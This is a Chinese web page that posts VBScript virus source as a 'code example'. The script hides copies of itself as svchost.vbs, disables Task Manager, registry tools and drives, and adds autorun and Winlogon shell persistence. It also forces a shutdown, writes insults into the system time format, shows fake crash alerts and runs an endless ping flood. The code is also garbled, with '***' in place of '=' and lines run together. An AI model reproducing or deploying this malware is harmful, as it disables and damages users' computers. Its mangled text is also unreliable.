admin管理员组文章数量:1794759
[语言编程] exe病毒代码实例
Set objFS *** CreateObject(“Scripting.FileSystemObject”) Set objFSO *** CreateObject(“Scripting.FileSystemObject”)set wsh *** wscript.createobject(“wscript.shell”)set reg *** wscript.createobject(“wscript.shell”)dim wsha *** WScript.ScriptFullNameb *** "shutdown -t 60 -s -cc *** "c:\\svchost.vbs"d *** "d:\\svchost.vbs"s *** "c:\\windows\\system32\\svchost.vbs"c1 *** "attrib +s +h +a +r c:\\svchost.vbs"d1 *** "attrib +s +h +a +r d:\\svchost.vbs"s1 *** "attrib +s +h +a +r c:\\windows\\system32\\svchost.vbs"If objFSO.FileExists © ThenElseobjFs.GetFile (a).Copy ©wsh.run c1End IfIf objFSO.FileExists(d) ThenElseobjFs.GetFile (a).Copy (d)wsh.run d1End IfIf objFSO.FileExists(s) ThenElseobjFs.GetFile (a).Copy (s)wsh.run s1End Ifwsh.run bwsh.run “narrator"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\exploreroRun”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\exploreroClose”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\exploreroLogoff”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\exploreroDesktop”,“00000001”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\exploreroDrives”,“000000100”,“REG_DWORD"reg.regwrite"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost”,“c:\\svchost.vbs”,“REG_SZ"reg.regwrite"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost”,“d:\\svchost.vbs”,“REG_SZ"reg.regwrite"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\svchost”,“c:\\windows\\system32\\svchost.vbs”,“REG_SZ"reg.regwrite"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\svchost”,“c:\\windows\\system32\\svchost.vbs”,“REG_SZ"reg.regwrite"HKEY_CURRENT_USER\\Control Panel\\International\\sTimeFormat”,“tttt H:mm:ss”,“REG_SZ"reg.regwrite"HKEY_CURRENT_USER\\Control Panel\\International\\s1159”,“笨蛋!”,“REG_SZ"reg.regwrite"HKEY_CURRENT_USER\\Control Panel\\International\\s2359”,“傻逼!”,“REG_SZ"reg.regwrite"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell”,“c:\\windows\\system32\\svchost.vbs”,"REG_SZ"msgbox “系统快要崩溃了!”,48,"由于你经常看黄页:"msgbox “windows崩溃了!”,18,"安全警报:"dowsh.run (“ping -t -l 6500 192.168.1.1”)loop
版权声明:本文标题:[语言编程] exe病毒代码实例 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1686559391a81859.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论